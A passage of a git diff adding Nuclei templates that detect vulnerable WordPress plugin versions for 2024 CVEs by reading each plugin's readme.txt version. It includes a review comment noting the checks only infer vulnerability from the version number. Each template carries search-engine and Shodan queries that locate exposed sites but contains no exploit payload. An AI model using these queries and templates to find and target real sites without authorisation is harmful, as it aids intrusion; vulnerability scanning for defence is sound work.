+ The Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/233319cc-10fc-4a15-be35-df772e700639?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-7716
+ metadata:
+ fofa-query: "wp-content/plugins/gs-logo-slider/"
+ google-query: inurl:"/wp-content/plugins/gs-logo-slider/"
+ shodan-query: 'vuln:CVE-2024-7716'
+ tags: cve,wordpress,wp-plugin,gs-logo-slider,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gs-logo-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gs-logo-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml b/poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml
new file mode 100644
index 0000000000..0f824b6e48
--- /dev/null
+++ b/poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed
+
+info:
+ name: >
+ Sensei LMS – Online Courses, Quizzes, & Learning <= 4.24.1 - Unauthenticated Email Template Disclosure
+ author: topscoder
+ severity: medium
+ description: >
+ The Sensei LMS – Online Courses, Quizzes, & Learning plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.24.1 via the /v2/sensei_email/ REST API endpoint due to a missing capability check. This makes it possible for unauthenticated attackers to extract data from email templates.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1df16802-c102-4ff2-b8ff-8a588905d3f7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-7786
+ metadata:
+ fofa-query: "wp-content/plugins/sensei-lms/"
+ google-query: inurl:"/wp-content/plugins/sensei-lms/"
+ shodan-query: 'vuln:CVE-2024-7786'
+ tags: cve,wordpress,wp-plugin,sensei-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sensei-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sensei-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.24.1')
\ No newline at end of file
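Review bot: The matchers only compare the readme.txt `Stable tag` against `<= 4.24.1`; the `/v2/sensei_email/` endpoint named in the description is never requested, so a hit is a version inference rather than a confirmed missing capability check, and a site that blocks or strips readme.txt is silently skipped. Nothing in `info` says so, and every template in this commit has the same shape, so a consumer reading the Wordfence-derived description will over-trust the result. Suggest a comment under `http:` in each file such as `# Version fingerprint only: compares the readme.txt Stable tag, does not exercise the vulnerable endpoint`, or `verified: false` under `metadata` if the repo uses that key. Note also that `redirects: true` with `max-redirects: 3` plus a `status: 200` matcher lets a redirect to a generic page reach the `word` and `dsl` checks, and the template then presumably relies on `compare_versions` failing when no version was extracted; documenting that reliance in a one-line comment would help whoever next tunes the matchers.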
diff --git a/poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml b/poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml
new file mode 100644
index 0000000000..33cbabfb78
--- /dev/null
+++ b/poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b
+
+info:
+ name: >
+ Classified Listing – Classified ads & Business Directory Plugin <= 3.1.7 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions like export_forms(), import_forms(), update_fb_options(), and many more in all versions up to, and including, 3.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify forms and various other settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/494d2e69-0759-419a-a603-e8870c157e49?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-7888
+ metadata:
+ fofa-query: "wp-content/plugins/classified-listing/"
+ google-query: inurl:"/wp-content/plugins/classified-listing/"
+ shodan-query: 'vuln:CVE-2024-7888'
+ tags: cve,wordpress,wp-plugin,classified-listing,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/classified-listing/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "classified-listing"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml b/poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml
new file mode 100644
index 0000000000..6521a6da0b
--- /dev/null
+++ b/poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7891-a07b427b3532ab45f1726dadba231414
+
+info:
+ name: >
+ Floating Contact Button <= 2.7 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Floating Contact Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9de6f14-67e4-40c2-8efb-7e9cad659d37?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-7891
+ metadata:
+ fofa-query: "wp-content/plugins/floating-contact/"
+ google-query: inurl:"/wp-content/plugins/floating-contact/"
+ shodan-query: 'vuln:CVE-2024-7891'
+ tags: cve,wordpress,wp-plugin,floating-contact,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/floating-contact/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "floating-contact"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml b/poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
new file mode 100644
index 0000000000..638c2d563b
--- /dev/null
+++ b/poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd
+
+info:
+ name: >
+ Starbox – the Author Box for Humans <= 3.5.1 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/210fd125-285d-4d07-bd39-b5ea222025ea?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-7955
+ metadata:
+ fofa-query: "wp-content/plugins/starbox/"
+ google-query: inurl:"/wp-content/plugins/starbox/"
+ shodan-query: 'vuln:CVE-2024-7955'
+ tags: cve,wordpress,wp-plugin,starbox,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/starbox/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "starbox"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.5.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml b/poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml
new file mode 100644
index 0000000000..bd2e7c2d0e
--- /dev/null
+++ b/poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5
+
+info:
+ name: >
+ Secure Downloads <= 1.2.2 - Authenticated (Admin+) Arbitrary File Download
+ author: topscoder
+ severity: low
+ description: >
+ The Secure Downloads plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.2 via the update() function. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/74506798-a198-4ea8-8628-01ce4df27abe?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 4.9
+ cve-id: CVE-2024-8031
+ metadata:
+ fofa-query: "wp-content/plugins/secure-downloads/"
+ google-query: inurl:"/wp-content/plugins/secure-downloads/"
+ shodan-query: 'vuln:CVE-2024-8031'
+ tags: cve,wordpress,wp-plugin,secure-downloads,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/secure-downloads/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "secure-downloads"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml b/poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml
new file mode 100644
index 0000000000..956460fdf5
--- /dev/null
+++ b/poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8242-cdbbac228ad219af93b654766e13b83b
+
+info:
+ name: >
+ MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Authenticated (Subscriber+) Limited Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_user_profile() function in all versions up to, and including, 4.15.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files (not including PHP files) on the affected site's server which may make remote code execution possible. This can be paired with a registration endpoint for unauthenticated users to exploit the issue.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-8242
+ metadata:
+ fofa-query: "wp-content/plugins/mstore-api/"
+ google-query: inurl:"/wp-content/plugins/mstore-api/"
+ shodan-query: 'vuln:CVE-2024-8242'
+ tags: cve,wordpress,wp-plugin,mstore-api,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mstore-api"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.15.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml b/poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml
new file mode 100644
index 0000000000..3c2aa0132c
--- /dev/null
+++ b/poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190
+
+info:
+ name: >
+ MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Unauthorized User Registration
+ author: topscoder
+ severity: high
+ description: >
+ The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 4.15.3. This is due to the plugin not checking that user registration is enabled prior to creating a user account through the register() function. This makes it possible for unauthenticated attackers to create user accounts on sites, even when user registration is disabled and plugin functionality is not activated.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: CVE-2024-8269
+ metadata:
+ fofa-query: "wp-content/plugins/mstore-api/"
+ google-query: inurl:"/wp-content/plugins/mstore-api/"
+ shodan-query: 'vuln:CVE-2024-8269'
+ tags: cve,wordpress,wp-plugin,mstore-api,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mstore-api"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.15.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml b/poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml
new file mode 100644
index 0000000000..409ba893d4
--- /dev/null
+++ b/poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8656-1116395151f79029236816f9e11f544d
+
+info:
+ name: >
+ WPFactory Helper <= 1.7.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WPFactory Helper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb62eefe-9993-43f7-b3ae-de47c0951bee?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8656
+ metadata:
+ fofa-query: "wp-content/plugins/wpcodefactory-helper/"
+ google-query: inurl:"/wp-content/plugins/wpcodefactory-helper/"
+ shodan-query: 'vuln:CVE-2024-8656'
+ tags: cve,wordpress,wp-plugin,wpcodefactory-helper,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpcodefactory-helper/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpcodefactory-helper"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml b/poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml
new file mode 100644
index 0000000000..a18351a7b1
--- /dev/null
+++ b/poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8663-483f5812b103f5a68eb659c586f798b2
+
+info:
+ name: >
+ WP Simple Booking Calendar <= 2.0.10 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Simple Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cad4300f-02f9-4c9f-9bb3-1c9da8b78ac9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8663
+ metadata:
+ fofa-query: "wp-content/plugins/wp-simple-booking-calendar/"
+ google-query: inurl:"/wp-content/plugins/wp-simple-booking-calendar/"
+ shodan-query: 'vuln:CVE-2024-8663'
+ tags: cve,wordpress,wp-plugin,wp-simple-booking-calendar,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-simple-booking-calendar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-simple-booking-calendar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.10')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml b/poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml
new file mode 100644
index 0000000000..1687a372d3
--- /dev/null
+++ b/poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835
+
+info:
+ name: >
+ WP Test Email <= 1.1.7 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Test Email plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/70c1ee04-cfb1-4819-95ab-497e814da16f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8664
+ metadata:
+ fofa-query: "wp-content/plugins/wp-test-email/"
+ google-query: inurl:"/wp-content/plugins/wp-test-email/"
+ shodan-query: 'vuln:CVE-2024-8664'
+ tags: cve,wordpress,wp-plugin,wp-test-email,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-test-email/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-test-email"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml b/poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml
new file mode 100644
index 0000000000..537105678f
--- /dev/null
+++ b/poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b
+
+info:
+ name: >
+ YITH Custom Login <= 1.7.3 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The YITH Custom Login plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8665
+ metadata:
+ fofa-query: "wp-content/plugins/yith-custom-login/"
+ google-query: inurl:"/wp-content/plugins/yith-custom-login/"
+ shodan-query: 'vuln:CVE-2024-8665'
+ tags: cve,wordpress,wp-plugin,yith-custom-login,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/yith-custom-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "yith-custom-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml b/poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
new file mode 100644
index 0000000000..da4c4d5a3a
--- /dev/null
+++ b/poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8714-03b5605b5eeba70097fb089d33700336
+
+info:
+ name: >
+ WordPress Affiliates Plugin — SliceWP Affiliates <= 1.1.20 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WordPress Affiliates Plugin — SliceWP Affiliates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.20. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/45dd22d4-9a51-4569-a756-1f1a5f8626c1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8714
+ metadata:
+ fofa-query: "wp-content/plugins/slicewp/"
+ google-query: inurl:"/wp-content/plugins/slicewp/"
+ shodan-query: 'vuln:CVE-2024-8714'
+ tags: cve,wordpress,wp-plugin,slicewp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/slicewp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "slicewp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.20')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml b/poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml
new file mode 100644
index 0000000000..6fbe4084eb
--- /dev/null
+++ b/poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8730-efc3370bbeb807667af618ae74e58df1
+
+info:
+ name: >
+ Exit Notifier <= 1.9.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Exit Notifier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc1aedb-e64f-4b61-a247-c3cdc731f001?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8730
+ metadata:
+ fofa-query: "wp-content/plugins/exit-notifier/"
+ google-query: inurl:"/wp-content/plugins/exit-notifier/"
+ shodan-query: 'vuln:CVE-2024-8730'
+ tags: cve,wordpress,wp-plugin,exit-notifier,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/exit-notifier/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
